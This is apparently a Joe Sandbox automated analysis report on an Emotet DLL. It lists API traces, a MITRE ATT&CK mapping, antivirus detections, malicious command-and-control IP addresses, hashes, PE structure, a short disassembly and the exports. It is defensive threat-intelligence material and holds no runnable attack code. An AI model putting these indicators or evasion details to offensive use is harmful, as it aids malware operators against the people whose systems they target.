Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E8057B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E7FD466
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E8054B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6E8055E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E805267
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E8050F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E80504B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E8051DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E80513F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7E4FD6 cpuid

0_2_6E7E4FD6

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E7E52FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6E7E52FC

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.2.rundll32.exe.a85f00.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6c4390.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.8b4350.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6c4390.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.8b4350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2d042a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.2d042a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.a85f00.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1000235837.000000000099C000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.977580541.0000000002CEA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.997848622.0000000002E95000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.997168710.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1134773374.0000000000A6A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.998474628.000000000089A000.00000004.00000020.sdmp, type: MEMORY

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E7D1890 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		0_2_6E7D1890
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E7D1890 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		2_2_6E7D1890

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Application Shimming1	Process Injection12	Masquerading2	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Application Shimming1	Virtualization/Sandbox Evasion11	LSASS Memory	Security Software Discovery23	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	System Information Discovery123	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rundll321	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	File Deletion1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
tUJXpPwU27.dll	42%	Virustotal		Browse
tUJXpPwU27.dll	49%	ReversingLabs	Win32.Trojan.Emotet

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.rundll32.exe.9e0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
4.2.rundll32.exe.630000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
5.2.rundll32.exe.810000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
2.2.rundll32.exe.2c60000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
0.2.loaddll32.exe.910000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File
3.2.rundll32.exe.7b0000.0.unpack	100%	Avira	HEUR/AGEN.1110387	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
196.44.98.190	unknown	Ghana	327814	EcobandGH	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
45.79.33.48	unknown	United States	63949	LINODE-APLinodeLLCUS	true
54.37.228.122	unknown	France	16276	OVHFR	true
185.148.169.10	unknown	Germany	44780	EVERSCALE-ASDE	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
51.178.61.60	unknown	France	16276	OVHFR	true
177.72.80.14	unknown	Brazil	262543	NewLifeFibraBR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
51.210.242.234	unknown	France	16276	OVHFR	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528351
Start date:	25.11.2021
Start time:	05:11:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	tUJXpPwU27 (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.evad.winDLL@26/0@0/20
EGA Information:	Failed
HDC Information:	Successful, ratio: 14% (good quality ratio 12.5%) Quality average: 67.9% Quality standard deviation: 30.6%
HCA Information:	Successful, ratio: 69% Number of executed functions: 35 Number of non-executed functions: 197
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 20.54.110.249, 52.251.79.25 Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	pYebrdRKvR.dll	Get hash	malicious	Browse
	pPX9DaPVYj.dll	Get hash	malicious	Browse
	wUKXjICs5f.dll	Get hash	malicious	Browse
	cRC6TZG6Wx.dll	Get hash	malicious	Browse
	qrb6jVwzoe.dll	Get hash	malicious	Browse
	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
196.44.98.190	pYebrdRKvR.dll	Get hash	malicious	Browse
	pPX9DaPVYj.dll	Get hash	malicious	Browse
	wUKXjICs5f.dll	Get hash	malicious	Browse
	cRC6TZG6Wx.dll	Get hash	malicious	Browse
	qrb6jVwzoe.dll	Get hash	malicious	Browse
	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse
78.46.73.125	pYebrdRKvR.dll	Get hash	malicious	Browse
	pPX9DaPVYj.dll	Get hash	malicious	Browse
	wUKXjICs5f.dll	Get hash	malicious	Browse
	cRC6TZG6Wx.dll	Get hash	malicious	Browse
	qrb6jVwzoe.dll	Get hash	malicious	Browse
	1711.doc	Get hash	malicious	Browse
	GQwxmGZFvtg.dll	Get hash	malicious	Browse
	wNjqkrm8pH.dll	Get hash	malicious	Browse
	5YO8hZg21O.dll	Get hash	malicious	Browse
	dUGnMYeP1C.dll	Get hash	malicious	Browse
	yFAXc9z51V.dll	Get hash	malicious	Browse
	9fC0as7YLE.dll	Get hash	malicious	Browse
	FIyE6huzxV.dll	Get hash	malicious	Browse
	V0gZWRXv8d.dll	Get hash	malicious	Browse
	t5EuQW2GUF.dll	Get hash	malicious	Browse
	uh1WyesPlh.dll	Get hash	malicious	Browse
	8rryPzJR1p.dll	Get hash	malicious	Browse
	a65FgjVus4.dll	Get hash	malicious	Browse
	bWjYh6H8wk.dll	Get hash	malicious	Browse
	ZJOHKItBoJ.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HETZNER-ASDE	LZxr7xI4nc.exe	Get hash	malicious	Browse	5.9.162.45
	3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exe	Get hash	malicious	Browse	5.9.162.45
	5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe	Get hash	malicious	Browse	5.9.162.45
	23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exe	Get hash	malicious	Browse	5.9.162.45
	exe.exe	Get hash	malicious	Browse	116.202.203.61
	J73PTzDghy.exe	Get hash	malicious	Browse	94.130.138.146
	piPvSLcFXV.exe	Get hash	malicious	Browse	88.99.210.172
	fkYZ7hyvnD.exe	Get hash	malicious	Browse	116.202.14.219
	.#U266bvmail-478314QOZVOYBY30.htm	Get hash	malicious	Browse	168.119.38.214
	pYebrdRKvR.dll	Get hash	malicious	Browse	78.47.204.80
	pPX9DaPVYj.dll	Get hash	malicious	Browse	78.47.204.80
	wUKXjICs5f.dll	Get hash	malicious	Browse	78.47.204.80
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	78.47.204.80
	qrb6jVwzoe.dll	Get hash	malicious	Browse	78.47.204.80
	copy_tt_inv_10192ne.exe	Get hash	malicious	Browse	49.12.42.56
	FACTURAS.exe	Get hash	malicious	Browse	116.202.203.61
	wE3YzRd1IZ.exe	Get hash	malicious	Browse	135.181.163.109
	wCkjCMnGrO	Get hash	malicious	Browse	116.203.73.1
	79GRrdea5l.exe	Get hash	malicious	Browse	159.69.123.221
	MtCsSK9TK2.exe	Get hash	malicious	Browse	95.216.4.252
AS-CHOOPAUS	LZxr7xI4nc.exe	Get hash	malicious	Browse	149.28.253.196
	3E8869030B9C89B8C43E9F8A6730A516E3945AB1272E3.exe	Get hash	malicious	Browse	149.28.253.196
	5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exe	Get hash	malicious	Browse	149.28.253.196
	asbestos_safety_and_eradication_agency_enterprise_agreement 41573 .js	Get hash	malicious	Browse	45.76.154.237
	23062BA932165210EBB3FFCD15474E79F19E6AD74869F.exe	Get hash	malicious	Browse	149.28.253.196
	DA8063D9EB60622915D492542A6A8AE318BC87B4C5F89.exe	Get hash	malicious	Browse	155.138.201.103
	asbestos_safety_and_eradication_agency_enterprise_agreement 64081 .js	Get hash	malicious	Browse	45.76.154.237
	pYebrdRKvR.dll	Get hash	malicious	Browse	66.42.57.149
	pPX9DaPVYj.dll	Get hash	malicious	Browse	66.42.57.149
	wUKXjICs5f.dll	Get hash	malicious	Browse	66.42.57.149
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	66.42.57.149
	qrb6jVwzoe.dll	Get hash	malicious	Browse	66.42.57.149
	AWB_NO_9284730932.exe	Get hash	malicious	Browse	45.32.28.45
	arm6-20211124-0649	Get hash	malicious	Browse	44.168.42.223
	6D2FF3CC83EA214E33E4105CCB1051CD85B82E052F615.exe	Get hash	malicious	Browse	149.28.253.196
	FhP4JYCU7J.exe	Get hash	malicious	Browse	149.28.253.196
	FhP4JYCU7J.exe	Get hash	malicious	Browse	149.28.253.196
	bomba.arm	Get hash	malicious	Browse	44.168.169.161
	44E401AAF0B52528AA033257C1A1B8A09A2B10EDF26ED.exe	Get hash	malicious	Browse	149.28.253.196
	77012C024869BA2639B54B959FAB1E10EBAAF8EBB9BFC.exe	Get hash	malicious	Browse	149.28.253.196
EcobandGH	pYebrdRKvR.dll	Get hash	malicious	Browse	196.44.98.190
	pPX9DaPVYj.dll	Get hash	malicious	Browse	196.44.98.190
	wUKXjICs5f.dll	Get hash	malicious	Browse	196.44.98.190
	cRC6TZG6Wx.dll	Get hash	malicious	Browse	196.44.98.190
	qrb6jVwzoe.dll	Get hash	malicious	Browse	196.44.98.190
	1711.doc	Get hash	malicious	Browse	196.44.98.190
	n6J7QJs4bk.dll	Get hash	malicious	Browse	196.44.109.73
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	196.44.98.190
	wNjqkrm8pH.dll	Get hash	malicious	Browse	196.44.98.190
	5YO8hZg21O.dll	Get hash	malicious	Browse	196.44.98.190
	dUGnMYeP1C.dll	Get hash	malicious	Browse	196.44.98.190
	yFAXc9z51V.dll	Get hash	malicious	Browse	196.44.98.190
	9fC0as7YLE.dll	Get hash	malicious	Browse	196.44.98.190
	FIyE6huzxV.dll	Get hash	malicious	Browse	196.44.98.190
	V0gZWRXv8d.dll	Get hash	malicious	Browse	196.44.98.190
	t5EuQW2GUF.dll	Get hash	malicious	Browse	196.44.98.190
	uh1WyesPlh.dll	Get hash	malicious	Browse	196.44.98.190
	8rryPzJR1p.dll	Get hash	malicious	Browse	196.44.98.190
	a65FgjVus4.dll	Get hash	malicious	Browse	196.44.98.190
	bWjYh6H8wk.dll	Get hash	malicious	Browse	196.44.98.190

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.1578551978819025
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tUJXpPwU27.dll
File size:	481792
MD5:	15239e7be7ce6bfaf0681eb66bcde356
SHA1:	55dc2a27f408bf6437224ecfc62cc01a3311ec08
SHA256:	79036368e6229fa1c4eb724a34e4d10973feaa85628058f4ac1eaac6c1fcf19c
SHA512:	366168368edc0dae19f071431deb1b5a8a9141179ebf84623e8053a00915dc69ec941273658a6c2a94f897f2fc053767774a310ccf4964d3e37d545ab1ad93fa
SSDEEP:	6144:m3M5xEQPjPLlMcp8gvSaX5EAoiAO0X1Ah8JOKXDebPG0+Z0C4OGUBbiA1:m3M5Bj5Mcp8QlwiaiYe6DZrzGyWA1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8...9...8...9...8...9...8...9...8...9...8...9...8...9...8...9...8...8]..8/..9...8/..9...8/..8...8..e8...8/..9...

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10014ee6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x619C8049 [Tue Nov 23 05:46:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	f81a3c8b673ca7b3a7f6c06eaa20660c

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FD9E49618D7h
call 00007FD9E4961D2Ah
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FD9E4961788h
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD9E494DEAEh
mov dword ptr [esi], 1003A3E8h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003A3F0h
mov dword ptr [ecx], 1003A3E8h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD9E494DE7Bh
mov dword ptr [esi], 1003A404h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 1003A40Ch
mov dword ptr [ecx], 1003A404h
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 1003A3DCh
push eax
call 00007FD9E4964FE6h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FD9E49618DCh
push 0000000Ch
push esi
call 00007FD9E4960D5Dh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FD9E496184Fh
push 0004BB5Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x4c620	0x31c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4c93c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x51000	0x24410	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x76000	0x3324	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x48818	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x3a000	0x2fc	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x389dc	0x38a00	False	0.532840956126	data	6.65955400705	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x3a000	0x13970	0x13a00	False	0.462567177548	data	5.41826950668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x4e000	0x252c	0x1800	False	0.224446614583	data	3.84154709275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x51000	0x24410	0x24600	False	0.810030068729	data	7.73179054959	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x76000	0x3324	0x3400	False	0.706280048077	data	6.57246100993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
REGISTRY	0x748d0	0x98	ASCII text, with CRLF line terminators	English	United States
REGISTRY	0x74968	0x260	ASCII text, with CRLF line terminators	English	United States
TYPELIB	0x74bc8	0x69c	data	English	United States
RT_BITMAP	0x51220	0x23467	data	English	United States
RT_STRING	0x75268	0x26	data	English	United States
RT_VERSION	0x74688	0x244	data	English	United States
RT_MANIFEST	0x75290	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
pdh.dll	PdhGetFormattedCounterValue, PdhCollectQueryData, PdhCloseQuery, PdhRemoveCounter, PdhAddCounterW, PdhValidatePathW, PdhOpenQueryW
KERNEL32.dll	GetCommandLineW, GetTickCount, GetThreadLocale, GetSystemDefaultUILanguage, UnregisterApplicationRecoveryCallback, AreFileApisANSI, GetEnvironmentStringsW, GetUserDefaultUILanguage, GetCommandLineA, GetOEMCP, GetACP, IsDebuggerPresent, GetLogicalDrives, GetThreadErrorMode, MultiByteToWideChar, RaiseException, GetLastError, InitializeCriticalSectionEx, DeleteCriticalSection, DecodePointer, EnterCriticalSection, LeaveCriticalSection, LoadResource, SizeofResource, FindResourceW, GetModuleHandleW, GetProcAddress, LoadLibraryExW, GetModuleFileNameW, lstrcmpiW, FreeLibrary, MulDiv, SetLastError, TerminateProcess, SetFilePointerEx, ReadConsoleW, GetConsoleMode, GetConsoleCP, GetCurrentThreadId, FlushFileBuffers, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, FreeEnvironmentStringsW, IsValidCodePage, FindFirstFileExA, HeapReAlloc, HeapSize, GetFileType, GetStdHandle, GetModuleFileNameA, GetModuleHandleExW, ExitProcess, InterlockedFlushSList, RtlUnwind, LocalFree, LoadLibraryExA, VirtualFree, VirtualAlloc, FlushInstructionCache, InterlockedPushEntrySList, InterlockedPopEntrySList, HeapFree, HeapAlloc, OutputDebugStringW, GetCPInfo, GetStringTypeW, GetLocaleInfoW, LCMapStringW, TlsFree, GetCurrentThread, SwitchToThread, GetCurrentProcessorNumber, GetSystemDefaultLangID, GetProcessHeap, CloseHandle, ReadFile, IsProcessorFeaturePresent, FindClose, FindNextFileA, TlsAlloc, GetTickCount64, SetStdHandle, WriteConsoleW, CreateFileW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, WriteFile, TlsSetValue, TlsGetValue, InitializeCriticalSectionAndSpinCount, EncodePointer, WideCharToMultiByte, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentProcessId, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcess
USER32.dll	IsWow64Message, GetForegroundWindow, GetDialogBaseUnits, GetKBCodePage, CreateMenu, CallWindowProcW, DrawTextW, InsertMenuW, RegisterClassExW, LoadCursorW, GetClassInfoExW, DefWindowProcW, IsWindow, GetParent, SetTimer, ShowWindow, InvalidateRect, ReleaseDC, GetDC, EndPaint, BeginPaint, ClientToScreen, GetClientRect, SendMessageW, DestroyWindow, CreateWindowExW, GetWindowLongW, SetWindowLongW, CharNextW, UnregisterClassW, GetProcessWindowStation, GetCapture, GetShellWindow, InSendMessage, GetDesktopWindow
GDI32.dll	SetBkMode, SetTextColor, CreateFontW, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, DeleteObject, GetTextMetricsW, SelectObject, GetDeviceCaps, GdiFlush, BitBlt
ADVAPI32.dll	RegDeleteValueW, RegQueryInfoKeyW, RegSetValueExW, RegEnumKeyExW, RegCloseKey, RegDeleteKeyW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	SHGetFolderPathW, ShellExecuteW, InitNetworkAddressControl
ole32.dll	CoUninitialize, CoCreateInstance, CoInitialize, OleRun, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree
OLEAUT32.dll	SysFreeString, SysAllocString, SysStringLen, VarBstrCmp, VariantInit, SysAllocStringLen, VariantCopy, VariantChangeType, VarUI4FromStr, LoadTypeLib, LoadRegTypeLib, VariantClear

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x10001200
aocchppr	2	0x100013b0
atibsyaucowikobny	3	0x10001420
bvafzbibi	4	0x10001260
ccqnwbyae	5	0x10001360
cexqsfxw	6	0x100012e0
empowarazlgur	7	0x10001410
endgbqmzljghfnq	8	0x100012a0
esdtimfxxlnmfs	9	0x10001280
etbieozyt	10	0x10001290
hkzzsvhejwyq	11	0x10001390
hmbsngzsvchwukon	12	0x100013a0
hxlaiiu	13	0x10001300
jqixmuxnbhtctasjq	14	0x10001350
jrkfsywgmnnf	15	0x10001330
kaytbfl	16	0x10001380
kdrtaqrgksymmwfa	17	0x10001250
lxyvbkrs	18	0x100013c0
mcciqvdkr	19	0x100012c0
nlkxsuvlirsnbibs	20	0x100012f0
nvpjwtm	21	0x10001310
qvwsndh	22	0x100012b0
skadootwpkucfzyhc	23	0x100013d0
spzoepcgjgfcwyvbv	24	0x10001340
tctmhmvyu	25	0x10001270
tulscoow	26	0x10001320
